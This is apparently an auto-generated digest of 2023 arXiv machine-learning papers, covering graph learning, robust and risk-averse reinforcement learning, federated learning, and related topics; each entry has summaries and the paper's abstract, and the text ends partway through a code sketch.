    Abstract The main bottleneck in designing efficient dynamic algorithms is the unknown nature of the update sequence. In particular, there are some problems, like 3-vertex connectivity, planar digraph all pairs shortest paths, and others, where the separation in runtime between the best partially dynamic solutions and the best fully dynamic solutions is polynomial, sometimes even exponential. In this paper, we formulate the predicted-deletion dynamic model, motivated by a recent line of empirical work about predicting edge updates in dynamic graphs. In this model, edges are inserted and deleted online, and when an edge is inserted, it is accompanied by a "prediction" of its deletion time. This models real world settings where services may have access to historical data or other information about an input and can subsequently use such information make predictions about user behavior. The model is also of theoretical interest, as it interpolates between the partially dynamic and fully dynamic settings, and provides a natural extension of the algorithms with predictions paradigm to the dynamic setting. We give a novel framework for this model that "lifts" partially dynamic algorithms into the fully dynamic setting with little overhead. We use our framework to obtain improved efficiency bounds over the state-of-the-art dynamic algorithms for a variety of problems. In particular, we design algorithms that have amortized update time that scales with a partially dynamic algorithm, with high probability, when the predictions are of high quality. On the flip side, our algorithms do no worse than existing fully-dynamic algorithms when the predictions are of low quality. Furthermore, our algorithms exhibit a graceful trade-off between the two cases. Thus, we are able to take advantage of ML predictions asymptotically "for free.''

Examining the Effects of Degree Distribution and Homophily in Graph Learning Models

  • paper_url: http://arxiv.org/abs/2307.08881
  • repo_url: https://github.com/google-research/graphworld
  • paper_authors: Mustafa Yasir, John Palowitch, Anton Tsitsulin, Long Tran-Thanh, Bryan Perozzi
  • for: This paper aims to improve the evaluation of graph neural network (GNN) models by expanding the coverage of graph space within the GraphWorld framework.
  • methods: The paper uses three synthetic graph generators: the Stochastic Block Model (SBM), LFR, and CABAM. These generators are integrated into the GraphWorld framework to create more diverse populations of synthetic graphs for benchmarking GNN tasks.
  • results: The paper generates 300,000 graphs to benchmark 11 GNN models on a node classification task, finds variations in GNN performance in response to homophily, degree distribution, and feature signal, and classifies GNN models by their sensitivity to the new generators under these properties. (A small SBM-generation sketch follows this entry.)
    Abstract Despite a surge in interest in GNN development, homogeneity in benchmarking datasets still presents a fundamental issue to GNN research. GraphWorld is a recent solution which uses the Stochastic Block Model (SBM) to generate diverse populations of synthetic graphs for benchmarking any GNN task. Despite its success, the SBM imposed fundamental limitations on the kinds of graph structure GraphWorld could create. In this work we examine how two additional synthetic graph generators can improve GraphWorld's evaluation; LFR, a well-established model in the graph clustering literature and CABAM, a recent adaptation of the Barabasi-Albert model tailored for GNN benchmarking. By integrating these generators, we significantly expand the coverage of graph space within the GraphWorld framework while preserving key graph properties observed in real-world networks. To demonstrate their effectiveness, we generate 300,000 graphs to benchmark 11 GNN models on a node classification task. We find GNN performance variations in response to homophily, degree distribution and feature signal. Based on these findings, we classify models by their sensitivity to the new generators under these properties. Additionally, we release the extensions made to GraphWorld on the GitHub repository, offering further evaluation of GNN performance on new graphs.
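As a concrete illustration of the kind of generator GraphWorld builds on, the sketch below draws a graph from a two-block Stochastic Block Model with networkx and measures its edge homophily and mean degree; the block sizes and edge probabilities are arbitrary illustrative values, not GraphWorld's parameterization.

```python
import networkx as nx

# Two equally sized blocks; within-block edge probability p_in, across-block p_out.
sizes = [100, 100]
p_in, p_out = 0.10, 0.02
G = nx.stochastic_block_model(sizes, [[p_in, p_out], [p_out, p_in]], seed=0)

# Nodes are numbered block by block, so block labels can be reconstructed from the sizes.
labels, node = {}, 0
for block_id, size in enumerate(sizes):
    for _ in range(size):
        labels[node] = block_id
        node += 1

# Edge homophily: fraction of edges that connect same-block nodes.
same = sum(labels[u] == labels[v] for u, v in G.edges())
homophily = same / G.number_of_edges()
degrees = [d for _, d in G.degree()]
print(f"edges={G.number_of_edges()}, homophily={homophily:.2f}, "
      f"mean degree={sum(degrees) / len(degrees):.1f}")
```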

Modular Neural Network Approaches for Surgical Image Recognition

  • paper_url: http://arxiv.org/abs/2307.08880
  • repo_url: None
  • paper_authors: Nosseiba Ben Salem, Younes Bennani, Joseph Karkazan, Abir Barbara, Charles Dacheux, Thomas Gregory
  • for: This work proposes modular deep learning architectures for surgical image recognition, addressing the growing complexity of modern problems and the scarcity of labeled data.
  • methods: It uses self-training to cope with limited annotations and decomposes the problem into simpler sub-tasks (modular learning) to improve generalization and interpretability.
  • results: Modular learning improved classification performance over non-modular systems for DCSS instability classification, with the weighted-modular variant (weighting expert outputs by the gating module's probabilities) achieving near-perfect classification; the approach also speeds up learning and improves interpretability. (A weighted-gating sketch follows this entry.)
    Abstract Deep learning-based applications have seen a lot of success in recent years. Text, audio, image, and video have all been explored with great success using deep learning approaches. The use of convolutional neural networks (CNN) in computer vision, in particular, has yielded reliable results. In order to achieve these results, a large amount of data is required. However, the dataset cannot always be accessible. Moreover, annotating data can be difficult and time-consuming. Self-training is a semi-supervised approach that managed to alleviate this problem and achieve state-of-the-art performances. Theoretical analysis even proved that it may result in a better generalization than a normal classifier. Another problem neural networks can face is the increasing complexity of modern problems, requiring a high computational and storage cost. One way to mitigate this issue, a strategy that has been inspired by human cognition known as modular learning, can be employed. The principle of the approach is to decompose a complex problem into simpler sub-tasks. This approach has several advantages, including faster learning, better generalization, and enables interpretability. In the first part of this paper, we introduce and evaluate different architectures of modular learning for Dorsal Capsulo-Scapholunate Septum (DCSS) instability classification. Our experiments have shown that modular learning improves performances compared to non-modular systems. Moreover, we found that weighted modular, that is to weight the output using the probabilities from the gating module, achieved an almost perfect classification. In the second part, we present our approach for data labeling and segmentation with self-training applied on shoulder arthroscopy images.
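The "weighted modular" idea of weighting expert outputs by the gating module's probabilities can be sketched as a small mixture-of-experts head; the linear experts, feature dimension, and class count below are illustrative assumptions and not the paper's architecture.

```python
import torch
import torch.nn as nn

class WeightedModularClassifier(nn.Module):
    """Toy 'weighted modular' head: a gating network produces a probability per expert,
    and expert logits are combined as a probability-weighted sum."""
    def __init__(self, in_dim, n_classes, n_experts=3):
        super().__init__()
        self.experts = nn.ModuleList(nn.Linear(in_dim, n_classes) for _ in range(n_experts))
        self.gate = nn.Sequential(nn.Linear(in_dim, n_experts), nn.Softmax(dim=-1))

    def forward(self, x):
        weights = self.gate(x)                                   # (B, n_experts)
        outs = torch.stack([e(x) for e in self.experts], dim=1)  # (B, n_experts, n_classes)
        return (weights.unsqueeze(-1) * outs).sum(dim=1)         # weighted combination

model = WeightedModularClassifier(in_dim=128, n_classes=2)
print(model(torch.randn(4, 128)).shape)  # torch.Size([4, 2])
```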

  • paper_url: http://arxiv.org/abs/2307.08877
  • repo_url: https://github.com/chatterjeeayan/upna
  • paper_authors: Ayan Chatterjee, Robin Walters, Giulia Menichetti, Tina Eliassi-Rad
  • for: Link prediction is a crucial task in graph machine learning with diverse applications. This paper studies the interplay between node attributes and graph topology and shows that incorporating pre-trained node attributes improves the generalization power of link prediction models.
  • methods: The proposed method, UPNA (Unsupervised Pre-training of Node Attributes), solves inductive link prediction by learning a function that takes a pair of node attributes as input and predicts the probability of an edge; unlike graph neural networks (GNNs), it avoids topological shortcuts in graphs with power-law degree distributions. (A pairwise-scoring sketch follows this entry.)
  • results: UPNA surpasses state-of-the-art performance with 3X to 34X improvement on benchmark datasets, can be applied to a variety of pairwise learning tasks, and can be integrated with existing link prediction models to enhance their generalizability and bolster graph generative models.
    Abstract Link prediction is a crucial task in graph machine learning with diverse applications. We explore the interplay between node attributes and graph topology and demonstrate that incorporating pre-trained node attributes improves the generalization power of link prediction models. Our proposed method, UPNA (Unsupervised Pre-training of Node Attributes), solves the inductive link prediction problem by learning a function that takes a pair of node attributes and predicts the probability of an edge, as opposed to Graph Neural Networks (GNN), which can be prone to topological shortcuts in graphs with power-law degree distribution. In this manner, UPNA learns a significant part of the latent graph generation mechanism since the learned function can be used to add incoming nodes to a growing graph. By leveraging pre-trained node attributes, we overcome observational bias and make meaningful predictions about unobserved nodes, surpassing state-of-the-art performance (3X to 34X improvement on benchmark datasets). UPNA can be applied to various pairwise learning tasks and integrated with existing link prediction models to enhance their generalizability and bolster graph generative models.
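A minimal sketch of the pairwise scoring idea (an edge probability computed from two nodes' attributes alone, with no topology) is given below; the symmetrization trick, hidden size, and module names are assumptions, and the actual UPNA method additionally relies on pre-trained attribute representations.

```python
import torch
import torch.nn as nn

class PairwiseEdgeScorer(nn.Module):
    """Score an edge from the attributes of its two endpoints only (no topology)."""
    def __init__(self, attr_dim, hidden=64):
        super().__init__()
        self.net = nn.Sequential(
            nn.Linear(2 * attr_dim, hidden), nn.ReLU(),
            nn.Linear(hidden, 1),
        )

    def forward(self, a_u, a_v):
        # Symmetrize so the score does not depend on endpoint order.
        s = self.net(torch.cat([a_u, a_v], dim=-1)) + self.net(torch.cat([a_v, a_u], dim=-1))
        return torch.sigmoid(0.5 * s).squeeze(-1)  # edge probability

scorer = PairwiseEdgeScorer(attr_dim=32)
a_u, a_v = torch.randn(5, 32), torch.randn(5, 32)
print(scorer(a_u, a_v))  # five probabilities in (0, 1)
```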

Natural Actor-Critic for Robust Reinforcement Learning with Function Approximation

  • paper_url: http://arxiv.org/abs/2307.08875
  • repo_url: None
  • paper_authors: Ruida Zhou, Tao Liu, Min Cheng, Dileep Kalathil, P. R. Kumar, Chao Tian
  • for: The goal is robust reinforcement learning (RL): finding a well-performing policy that remains robust under model mismatch between the training simulator and the testing environment.
  • methods: The paper proposes two novel uncertainty set formulations, one based on double sampling and the other on an integral probability metric, which make large-scale robust RL tractable even with access only to a simulator. It then proposes a robust natural actor-critic (RNAC) approach that incorporates the new uncertainty sets and uses function approximation, with finite-time convergence guarantees to the optimal robust policy within the function approximation error.
  • results: Experiments demonstrate the robust performance of the learned policies in multiple MuJoCo environments and a real-world TurtleBot navigation task.
    Abstract We study robust reinforcement learning (RL) with the goal of determining a well-performing policy that is robust against model mismatch between the training simulator and the testing environment. Previous policy-based robust RL algorithms mainly focus on the tabular setting under uncertainty sets that facilitate robust policy evaluation, but are no longer tractable when the number of states scales up. To this end, we propose two novel uncertainty set formulations, one based on double sampling and the other on an integral probability metric. Both make large-scale robust RL tractable even when one only has access to a simulator. We propose a robust natural actor-critic (RNAC) approach that incorporates the new uncertainty sets and employs function approximation. We provide finite-time convergence guarantees for the proposed RNAC algorithm to the optimal robust policy within the function approximation error. Finally, we demonstrate the robust performance of the policy learned by our proposed RNAC approach in multiple MuJoCo environments and a real-world TurtleBot navigation task.

Latent Space Representations of Neural Algorithmic Reasoners

  • paper_url: http://arxiv.org/abs/2307.08874
  • repo_url: https://github.com/mirjanic/nar-latent-spaces
  • paper_authors: Vladimir V. Mirjanić, Razvan Pascanu, Petar Veličković
  • for: This work studies Neural Algorithmic Reasoning (NAR), the problem of designing neural architectures that reliably capture classical computation by learning to execute algorithms.
  • methods: The study analyzes graph neural network (GNN) architectures that encode inputs into a high-dimensional latent space that is repeatedly transformed while the algorithm executes.
  • results: The analysis identifies two failure modes of the latent space: (i) loss of resolution, making similar values hard to distinguish, and (ii) inability to handle values outside the range seen during training. Replacing the aggregator with a softmax aggregator and decaying the latent space address these issues, improving performance on most algorithms in the CLRS-30 benchmark with the state-of-the-art Triplet-GMPNN processor. (A softmax-aggregation sketch follows this entry.)
    Abstract Neural Algorithmic Reasoning (NAR) is a research area focused on designing neural architectures that can reliably capture classical computation, usually by learning to execute algorithms. A typical approach is to rely on Graph Neural Network (GNN) architectures, which encode inputs in high-dimensional latent spaces that are repeatedly transformed during the execution of the algorithm. In this work we perform a detailed analysis of the structure of the latent space induced by the GNN when executing algorithms. We identify two possible failure modes: (i) loss of resolution, making it hard to distinguish similar values; (ii) inability to deal with values outside the range observed during training. We propose to solve the first issue by relying on a softmax aggregator, and propose to decay the latent space in order to deal with out-of-range values. We show that these changes lead to improvements on the majority of algorithms in the standard CLRS-30 benchmark when using the state-of-the-art Triplet-GMPNN processor. Our code is available at \href{https://github.com/mirjanic/nar-latent-spaces}{https://github.com/mirjanic/nar-latent-spaces}.
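A softmax aggregator of the kind discussed can be sketched as an element-wise, temperature-controlled soft maximum over neighbor messages; the exact form used in the paper may differ, so this is only an illustration of why such an aggregator interpolates between max- and mean-pooling and can preserve more resolution than a hard max.

```python
import torch

def softmax_aggregate(messages, temperature=1.0):
    """Aggregate neighbor messages with element-wise softmax weights.

    `messages` has shape (num_neighbors, dim). A low temperature approaches
    max-pooling; a high temperature approaches mean-pooling. The temperature and
    this exact form are illustrative assumptions.
    """
    weights = torch.softmax(messages / temperature, dim=0)  # per-feature weights over neighbors
    return (weights * messages).sum(dim=0)

msgs = torch.tensor([[1.0, -2.0], [3.0, 0.5], [0.0, 4.0]])
print(softmax_aggregate(msgs))          # close to the per-feature max for T=1
print(softmax_aggregate(msgs, 100.0))   # close to the per-feature mean
```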

An Alternative to Variance: Gini Deviation for Risk-averse Policy Gradient

  • paper_url: http://arxiv.org/abs/2307.08873
  • repo_url: None
  • paper_authors: Yudong Luo, Guiliang Liu, Pascal Poupart, Yangchen Pan
  • for: The goal is risk-averse reinforcement learning: learning policies that keep return variability low while avoiding the drawbacks of penalizing return variance directly, such as sensitivity to numerical scale.
  • methods: The paper proposes Gini deviation as an alternative risk measure to variance, studies its properties, and derives a policy gradient algorithm that minimizes it. (A small computation of the measure follows this entry.)
  • results: In domains where risk aversion can be clearly defined, optimizing Gini deviation yields policies with high return and low risk, in terms of both variance and Gini deviation, in cases where variance-based methods fail to learn a reasonable policy.
    Abstract Restricting the variance of a policy's return is a popular choice in risk-averse Reinforcement Learning (RL) due to its clear mathematical definition and easy interpretability. Traditional methods directly restrict the total return variance. Recent methods restrict the per-step reward variance as a proxy. We thoroughly examine the limitations of these variance-based methods, such as sensitivity to numerical scale and hindering of policy learning, and propose to use an alternative risk measure, Gini deviation, as a substitute. We study various properties of this new risk measure and derive a policy gradient algorithm to minimize it. Empirical evaluation in domains where risk-aversion can be clearly defined, shows that our algorithm can mitigate the limitations of variance-based risk measures and achieves high return with low risk in terms of variance and Gini deviation when others fail to learn a reasonable policy.
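For intuition, the sketch below estimates a Gini-deviation-style risk measure from sampled returns as half the mean absolute difference over all pairs; the precise normalization and the way the measure enters the policy gradient in the paper may differ.

```python
import numpy as np

def gini_deviation(returns):
    """Half the mean absolute difference between all pairs of sampled returns.

    This is one common definition (Gini mean difference / 2); the exact
    normalization used in the paper may differ, so treat this as an
    illustrative estimator from Monte-Carlo returns.
    """
    x = np.asarray(returns, dtype=float)
    diffs = np.abs(x[:, None] - x[None, :])  # pairwise |x_i - x_j|
    return 0.5 * diffs.mean()

low_risk = np.array([10.0, 10.5, 9.5, 10.2, 9.8])
high_risk = np.array([0.0, 20.0, 5.0, 25.0, 0.0])
print(gini_deviation(low_risk), gini_deviation(high_risk))  # the riskier returns score higher
```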

Meta-Value Learning: a General Framework for Learning with Learning Awareness

  • paper_url: http://arxiv.org/abs/2307.08863
  • repo_url: https://github.com/metavaluelearning/metavaluelearning
  • paper_authors: Tim Cooijmans, Milad Aghajohari, Aaron Courville
  • for: This paper addresses gradient-based learning in multi-agent systems, which is difficult because the gradient comes from a first-order model that does not account for the interaction between agents' learning processes.
  • methods: It extends the ideas of LOLA into a fully general value-based approach to optimization. At its core is a meta-value function that, at each point in joint-policy space, gives each agent a discounted sum of its objective over future optimization steps; the gradient of the meta-value is argued to be a more reliable improvement direction than the gradient of the original objective, because it derives from empirical observations of the effects of optimization.
  • results: The behavior of the method is analyzed on the Logistic Game and on the Iterated Prisoner's Dilemma.
    Abstract Gradient-based learning in multi-agent systems is difficult because the gradient derives from a first-order model which does not account for the interaction between agents' learning processes. LOLA (arXiv:1709.04326) accounts for this by differentiating through one step of optimization. We extend the ideas of LOLA and develop a fully-general value-based approach to optimization. At the core is a function we call the meta-value, which at each point in joint-policy space gives for each agent a discounted sum of its objective over future optimization steps. We argue that the gradient of the meta-value gives a more reliable improvement direction than the gradient of the original objective, because the meta-value derives from empirical observations of the effects of optimization. We show how the meta-value can be approximated by training a neural network to minimize TD error along optimization trajectories in which agents follow the gradient of the meta-value. We analyze the behavior of our method on the Logistic Game and on the Iterated Prisoner's Dilemma.

Curriculum Learning for Graph Neural Networks: A Multiview Competence-based Approach

  • paper_url: http://arxiv.org/abs/2307.08859
  • repo_url: https://github.com/CLU-UML/MCCL
  • paper_authors: Nidhi Vakil, Hadi Amiri
  • for: This work proposes a new approach to curriculum learning for training graph neural networks, built on graph complexity formalisms (as difficulty criteria) and model competence during training.
  • methods: The method uses a scheduling scheme that derives effective curricula by accounting for different views of sample difficulty and model competence during training, allowing a fine-grained spectrum of graph difficulty criteria to be incorporated.
  • results: Experimental results on real-world link prediction and node classification tasks illustrate the effectiveness of the proposed approach.
    Abstract A curriculum is a planned sequence of learning materials and an effective one can make learning efficient and effective for both humans and machines. Recent studies developed effective data-driven curriculum learning approaches for training graph neural networks in language applications. However, existing curriculum learning approaches often employ a single criterion of difficulty in their training paradigms. In this paper, we propose a new perspective on curriculum learning by introducing a novel approach that builds on graph complexity formalisms (as difficulty criteria) and model competence during training. The model consists of a scheduling scheme which derives effective curricula by accounting for different views of sample difficulty and model competence during training. The proposed solution advances existing research in curriculum learning for graph neural networks with the ability to incorporate a fine-grained spectrum of graph difficulty criteria in their training paradigms. Experimental results on real-world link prediction and node classification tasks illustrate the effectiveness of the proposed approach.

An Admissible Shift-Consistent Method for Recommender Systems

  • paper_url: http://arxiv.org/abs/2307.08857
  • repo_url: None
  • paper_authors: Tung Nguyen, Jeffrey Uhlmann
  • for: solves matrix/tensor completion problems in the context of recommender systems
  • methods: proposes a new constraint called shift-consistency, and provides a rigorous mathematical description of the method
  • results: provably guarantees several key mathematical properties, including satisfaction of an admissibility criterion, fairness, and robustness
    Abstract In this paper, we propose a new constraint, called shift-consistency, for solving matrix/tensor completion problems in the context of recommender systems. Our method provably guarantees several key mathematical properties: (1) satisfies a recently established admissibility criterion for recommender systems; (2) satisfies a definition of fairness that eliminates a specific class of potential opportunities for users to maliciously influence system recommendations; and (3) offers robustness by exploiting provable uniqueness of missing-value imputation. We provide a rigorous mathematical description of the method, including its generalization from matrix to tensor form to permit representation and exploitation of complex structural relationships among sets of user and product attributes. We argue that our analysis suggests a structured means for defining latent-space projections that can permit provable performance properties to be established for machine learning methods.

Autoregressive Diffusion Model for Graph Generation

  • paper_url: http://arxiv.org/abs/2307.08849
  • repo_url: None
  • paper_authors: Lingkai Kong, Jiaming Cui, Haotian Sun, Yuchen Zhuang, B. Aditya Prakash, Chao Zhang
  • for: This paper proposes an autoregressive diffusion model for graph generation.
  • methods: The model operates directly in the discrete graph space via a node-absorbing diffusion process. For forward diffusion, a data-dependent diffusion ordering network learns a node-absorbing order from graph topology; for reverse generation, a denoising network uses the reverse node order to efficiently reconstruct the graph, predicting one new node's type and its edges to previously denoised nodes at a time.
  • results: On six diverse generic graph datasets and two molecule datasets, the model achieves generation performance that is better than or comparable to the previous state of the art while enjoying fast generation speed.
    Abstract Diffusion-based graph generative models have recently obtained promising results for graph generation. However, existing diffusion-based graph generative models are mostly one-shot generative models that apply Gaussian diffusion in the dequantized adjacency matrix space. Such a strategy can suffer from difficulty in model training, slow sampling speed, and incapability of incorporating constraints. We propose an \emph{autoregressive diffusion} model for graph generation. Unlike existing methods, we define a node-absorbing diffusion process that operates directly in the discrete graph space. For forward diffusion, we design a \emph{diffusion ordering network}, which learns a data-dependent node absorbing ordering from graph topology. For reverse generation, we design a \emph{denoising network} that uses the reverse node ordering to efficiently reconstruct the graph by predicting the node type of the new node and its edges with previously denoised nodes at a time. Based on the permutation invariance of graph, we show that the two networks can be jointly trained by optimizing a simple lower bound of data likelihood. Our experiments on six diverse generic graph datasets and two molecule datasets show that our model achieves better or comparable generation performance with previous state-of-the-art, and meanwhile enjoys fast generation speed.

Privacy-preserving patient clustering for personalized federated learning

  • paper_url: http://arxiv.org/abs/2307.08847
  • repo_url: https://github.com/g2lab/pcfbl
  • paper_authors: Ahmed Elhussein, Gamze Gursoy
  • for: This work addresses the non-IID data problem in Federated Learning (FL) and proposes the Privacy-preserving Community-Based Federated machine Learning (PCBFL) framework, which trains cluster-specific models across hospitals while protecting privacy.
  • methods: PCBFL uses Secure Multiparty Computation (SMPC) to securely compute patient-level similarity scores across hospitals and then clusters patients into groups across sites.
  • results: PCBFL successfully forms clinically meaningful cohorts of low-, medium-, and high-risk patients and outperforms traditional and existing clustered FL frameworks, with an average AUC improvement of 4.3% and an AUPRC improvement of 7.8%.
    Abstract Federated Learning (FL) is a machine learning framework that enables multiple organizations to train a model without sharing their data with a central server. However, it experiences significant performance degradation if the data is non-identically independently distributed (non-IID). This is a problem in medical settings, where variations in the patient population contribute significantly to distribution differences across hospitals. Personalized FL addresses this issue by accounting for site-specific distribution differences. Clustered FL, a Personalized FL variant, was used to address this problem by clustering patients into groups across hospitals and training separate models on each group. However, privacy concerns remained as a challenge as the clustering process requires exchange of patient-level information. This was previously solved by forming clusters using aggregated data, which led to inaccurate groups and performance degradation. In this study, we propose Privacy-preserving Community-Based Federated machine Learning (PCBFL), a novel Clustered FL framework that can cluster patients using patient-level data while protecting privacy. PCBFL uses Secure Multiparty Computation, a cryptographic technique, to securely calculate patient-level similarity scores across hospitals. We then evaluate PCBFL by training a federated mortality prediction model using 20 sites from the eICU dataset. We compare the performance gain from PCBFL against traditional and existing Clustered FL frameworks. Our results show that PCBFL successfully forms clinically meaningful cohorts of low, medium, and high-risk patients. PCBFL outperforms traditional and existing Clustered FL frameworks with an average AUC improvement of 4.3% and AUPRC improvement of 7.8%.

Bayesian Safe Policy Learning with Chance Constrained Optimization: Application to Military Security Assessment during the Vietnam War

  • paper_url: http://arxiv.org/abs/2307.08840
  • repo_url: None
  • paper_authors: Zeyang Jia, Eli Ben-Michael, Kosuke Imai
  • for: The paper aims to improve a security assessment algorithm used during the Vietnam War, using outcomes measured immediately after its introduction in late 1969.
  • methods: It introduces the Average Conditional Risk (ACRisk) to quantify the risk of worse outcomes for subgroups of individual units, and a Bayesian policy learning framework that maximizes the posterior expected value while controlling the posterior expected ACRisk.
  • results: Compared with the algorithm actually used during the Vietnam War, the learned algorithm assesses most regions as more secure and emphasizes economic and political factors over military factors.
    Abstract Algorithmic and data-driven decisions and recommendations are commonly used in high-stakes decision-making settings such as criminal justice, medicine, and public policy. We investigate whether it would have been possible to improve a security assessment algorithm employed during the Vietnam War, using outcomes measured immediately after its introduction in late 1969. This empirical application raises several methodological challenges that frequently arise in high-stakes algorithmic decision-making. First, before implementing a new algorithm, it is essential to characterize and control the risk of yielding worse outcomes than the existing algorithm. Second, the existing algorithm is deterministic, and learning a new algorithm requires transparent extrapolation. Third, the existing algorithm involves discrete decision tables that are common but difficult to optimize over. To address these challenges, we introduce the Average Conditional Risk (ACRisk), which first quantifies the risk that a new algorithmic policy leads to worse outcomes for subgroups of individual units and then averages this over the distribution of subgroups. We also propose a Bayesian policy learning framework that maximizes the posterior expected value while controlling the posterior expected ACRisk. This framework separates the estimation of heterogeneous treatment effects from policy optimization, enabling flexible estimation of effects and optimization over complex policy classes. We characterize the resulting chance-constrained optimization problem as a constrained linear programming problem. Our analysis shows that compared to the actual algorithm used during the Vietnam War, the learned algorithm assesses most regions as more secure and emphasizes economic and political factors over military factors.

A Meta-Learning Based Precoder Optimization Framework for Rate-Splitting Multiple Access

  • paper_url: http://arxiv.org/abs/2307.08822
  • repo_url: None
  • paper_authors: Rafael Cerna Loli, Bruno Clerckx
  • for: This letter proposes a meta-learning based precoder optimization framework that directly optimizes Rate-Splitting Multiple Access (RSMA) precoders with only partial Channel State Information at the Transmitter (CSIT).
  • methods: By exploiting the overfitting of a compact neural network to maximize the explicit Average Sum-Rate (ASR) expression, the approach bypasses the need for any other training data while minimizing total running time.
  • results: Numerical results show that the meta-learning based solution achieves ASR performance similar to conventional precoder optimization in medium-scale scenarios and significantly outperforms sub-optimal low-complexity precoder algorithms in the large-scale regime.
    Abstract In this letter, we propose the use of a meta-learning based precoder optimization framework to directly optimize the Rate-Splitting Multiple Access (RSMA) precoders with partial Channel State Information at the Transmitter (CSIT). By exploiting the overfitting of the compact neural network to maximize the explicit Average Sum-Rate (ASR) expression, we effectively bypass the need for any other training data while minimizing the total running time. Numerical results reveal that the meta-learning based solution achieves similar ASR performance to conventional precoder optimization in medium-scale scenarios, and significantly outperforms sub-optimal low complexity precoder algorithms in the large-scale regime.

Towards Accelerating Benders Decomposition via Reinforcement Learning Surrogate Models

  • paper_url: http://arxiv.org/abs/2307.08816
  • repo_url: None
  • paper_authors: Stephen Mak, Kyle Mana, Parisa Zehtabi, Michael Cashmore, Daniele Magazzeni, Manuela Veloso
  • for: This paper aims to accelerate Benders decomposition (BD) for stochastic optimization problems under uncertainty.
  • methods: It replaces the NP-hard integer master problem in BD with a surrogate model, specifically a reinforcement learning agent, to speed up the decomposition.
  • results: On a stochastic inventory management problem, the accelerated method converges on average 30% faster than other accelerated BD implementations.
    Abstract Stochastic optimization (SO) attempts to offer optimal decisions in the presence of uncertainty. Often, the classical formulation of these problems becomes intractable due to (a) the number of scenarios required to capture the uncertainty and (b) the discrete nature of real-world planning problems. To overcome these tractability issues, practitioners turn to decomposition methods that divide the problem into smaller, more tractable sub-problems. The focal decomposition method of this paper is Benders decomposition (BD), which decomposes stochastic optimization problems on the basis of scenario independence. In this paper we propose a method of accelerating BD with the aid of a surrogate model in place of an NP-hard integer master problem. Through the acceleration method we observe 30% faster average convergence when compared to other accelerated BD implementations. We introduce a reinforcement learning agent as a surrogate and demonstrate how it can be used to solve a stochastic inventory management problem.

Comparative Performance Evaluation of Large Language Models for Extracting Molecular Interactions and Pathway Knowledge

  • paper_url: http://arxiv.org/abs/2307.08813
  • repo_url: https://github.com/boxorange/bioie-llm
  • paper_authors: Gilchan Park, Byung-Jun Yoon, Xihaier Luo, Vanessa López-Marrero, Patrick Johnstone, Shinjae Yoo, Francis J. Alexander
  • for: The goal of this study is to use large language models to automatically extract knowledge of protein interactions, pathways, and gene regulatory relations from scientific literature.
  • methods: The study uses different large language models to complete tasks of recognizing protein interactions, pathways, and gene regulatory relations.
  • results: The study finds the effectiveness of different language models in completing these tasks, provides significant findings, and discusses future opportunities and remaining challenges.
    Abstract Understanding protein interactions and pathway knowledge is crucial for unraveling the complexities of living systems and investigating the underlying mechanisms of biological functions and complex diseases. While existing databases provide curated biological data from literature and other sources, they are often incomplete and their maintenance is labor-intensive, necessitating alternative approaches. In this study, we propose to harness the capabilities of large language models to address these issues by automatically extracting such knowledge from the relevant scientific literature. Toward this goal, in this work, we investigate the effectiveness of different large language models in tasks that involve recognizing protein interactions, pathways, and gene regulatory relations. We thoroughly evaluate the performance of various models, highlight the significant findings, and discuss both the future opportunities and the remaining challenges associated with this approach. The code and data are available at: https://github.com/boxorange/BioIE-LLM

DeepMem: ML Models as storage channels and their (mis-)applications

  • paper_url: http://arxiv.org/abs/2307.08811
  • repo_url: None
  • paper_authors: Md Abdullah Al Mamun, Quazi Mishkatul Alam, Erfan Shaigani, Pedram Zaree, Ihsen Alouani, Nael Abu-Ghazaleh
  • for: This paper proposes an information-theoretic perspective that views an ML model as a storage channel whose capacity increases with overparameterization, and studies storing and extracting hidden information through that channel.
  • methods: A sender embeds arbitrary information in the model at training time by augmenting the training data, and a receiver with black-box access to the deployed model extracts it by querying the model; the paper derives an upper bound on the channel capacity based on the number of available parameters.
  • results: The paper analyzes the write and read primitives and their detectability, introduces a covertness constraint that limits the distribution shift from the baseline task (and hence the effective capacity), and develops optimizations, including a novel ML-specific substitution-based error correction protocol, to improve capacity in that setting.
    Abstract Machine learning (ML) models are overparameterized to support generality and avoid overfitting. Prior works have shown that these additional parameters can be used for both malicious (e.g., hiding a model covertly within a trained model) and beneficial purposes (e.g., watermarking a model). In this paper, we propose a novel information theoretic perspective of the problem; we consider the ML model as a storage channel with a capacity that increases with overparameterization. Specifically, we consider a sender that embeds arbitrary information in the model at training time, which can be extracted by a receiver with a black-box access to the deployed model. We derive an upper bound on the capacity of the channel based on the number of available parameters. We then explore black-box write and read primitives that allow the attacker to: (i) store data in an optimized way within the model by augmenting the training data at the transmitter side, and (ii) to read it by querying the model after it is deployed. We also analyze the detectability of the writing primitive and consider a new version of the problem which takes information storage covertness into account. Specifically, to obtain storage covertness, we introduce a new constraint such that the data augmentation used for the write primitives minimizes the distribution shift with the initial (baseline task) distribution. This constraint introduces a level of "interference" with the initial task, thereby limiting the channel's effective capacity. Therefore, we develop optimizations to improve the capacity in this case, including a novel ML-specific substitution based error correction protocol. We believe that the proposed modeling of the problem offers new tools to better understand and mitigate potential vulnerabilities of ML, especially in the context of increasingly large models.

Operator Guidance Informed by AI-Augmented Simulations

  • paper_url: http://arxiv.org/abs/2307.08810
  • repo_url: None
  • paper_authors: Samuel J. Edwards, Michael Levine
  • for: This paper presents a multi-fidelity, data-adaptive approach for estimating ship response statistics in bimodal, bidirectional seas.
  • methods: It combines a Long Short-Term Memory (LSTM) neural network with a fast, low-fidelity volume-based tool (SimpleCode) and a higher-fidelity tool, the Large Amplitude Motion Program (LAMP). (A minimal LSTM regression sketch follows this entry.)
  • results: After training the LSTM on LAMP ship motion response data, a sample route with randomly sampled historical weather was run through SimpleCode and the LSTM network, and the resulting estimates compared well against the higher-fidelity LAMP results.
    Abstract This paper will present a multi-fidelity, data-adaptive approach with a Long Short-Term Memory (LSTM) neural network to estimate ship response statistics in bimodal, bidirectional seas. The study will employ a fast low-fidelity, volume-based tool SimpleCode and a higher-fidelity tool known as the Large Amplitude Motion Program (LAMP). SimpleCode and LAMP data were generated by common bi-modal, bi-directional sea conditions in the North Atlantic as training data. After training an LSTM network with LAMP ship motion response data, a sample route was traversed and randomly sampled historical weather was input into SimpleCode and the LSTM network, and compared against the higher fidelity results.
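A minimal sketch of an LSTM regressor of the general kind described (a sequence of sea-state features in, a response statistic out) is shown below; the input features, dimensions, and single-output head are assumptions, not the paper's configuration.

```python
import torch
import torch.nn as nn

class ResponseLSTM(nn.Module):
    """Map a sequence of sea-state / low-fidelity features to a response statistic.

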